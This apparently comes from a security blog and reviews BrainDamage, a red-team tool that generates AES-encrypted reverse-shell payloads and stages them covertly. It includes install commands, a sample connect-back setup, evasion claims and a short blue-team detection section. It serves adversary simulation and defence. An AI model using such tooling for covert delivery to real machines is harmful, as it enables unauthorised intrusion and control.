BrainDamage is a payload generation and encrypted staging tool designed for red teamers and adversary simulation teams. It provides the ability to craft shell scripts with embedded AES encryption. It serves them over a dedicated command-and-control interface, making it useful for early-stage payload deployment and post-exploitation pivoting.
While many payload generators exist, few offer the ease of use, encryption by default, and staging functionality packed into BrainDamage. It’s a cross-platform tool designed to support Linux, macOS, and Windows, and is especially relevant for scenarios where shellcode or payloads must be delivered covertly to compromised machines.
Features
- Encrypted Staging: Payloads are encrypted using AES before delivery, thereby mitigating basic static inspection.
- Payload Types: Supports bash reverse shells, Python payloads, and custom shellcode injection.
- Built-in HTTP/S Server: Hosts and serves payloads via a lightweight Flask-based interface.
- Session Tracking: Keeps track of staged payload execution and handler activity.
- Custom Encoding: Offers basic obfuscation to avoid string-based detections.
Installation and Usage
Clone the repo:
git clone https://github.com/mehulj94/BrainDamage.git<br>cd BrainDamage<br>pip install -r requirements.txt |
To start the server and create a basic payload:
Interactive prompt example:
[+] Welcome to BrainDamage [?] Choose payload type: [bash/python/shellcode] [?] Enter IP to connect back: 192.168.1.10 [?] Enter port: 4444 [+] Payload created and encrypted at /payloads/bd_payload.sh [+] Serving on http://0.0.0.0:8080 |
Red Team Relevance
BrainDamage fills a niche in red team operations where encrypted staging and lightweight reverse shell deployment are critical. Unlike heavier C2 platforms like Sliver, this tool doesn’t attempt to replicate a complete C2 infrastructure. Instead, it focuses on delivering an initial payload stealthily and efficiently.
For red teams operating in environments with basic monitoring or string-matching defences, the AES-encryption of payloads and optional obfuscation make BrainDamage harder to flag during ingress.
Detection Considerations
While the tool encrypts payloads, execution methods like piping output to bash (| bash) remain a known red flag for EDR tools. Blue teams should monitor for outbound curl/wget behaviour to unexpected hosts and script execution patterns involving shell interpreters. Proxies or memory forensics tools, such as Rekall, can also help detect in-memory payload staging.
Comparison
Compared to other payload staging tools:
| Tool | Encryption | Platform Support | Staging Server | Use Case |
|---|---|---|---|---|
| BrainDamage | Yes (AES) | Windows/Linux/macOS | Built-in Flask | Encrypted payload delivery |
| Unicorn | No | Windows | Manual | PowerShell/MSF payload generation |
| Donut | No | Windows | None | Shellcode loader for .NET binaries |
| SharpC2 | Yes | Windows | Custom | Advanced modular C2 framework |
Final Thoughts
BrainDamage isn’t trying to be the next Empire or Covenant. Its strength lies in its simplicity. For red teams needing a flexible, encrypted way to deliver payloads without raising obvious flags, it’s a worthy addition to the toolkit.
Pair it with reconnaissance tools like Argus or delivery tools like EvilReplay to build a modular, modern attack chain.
You can read more or download BrainDamage here: https://github.com/mehulj94/BrainDamage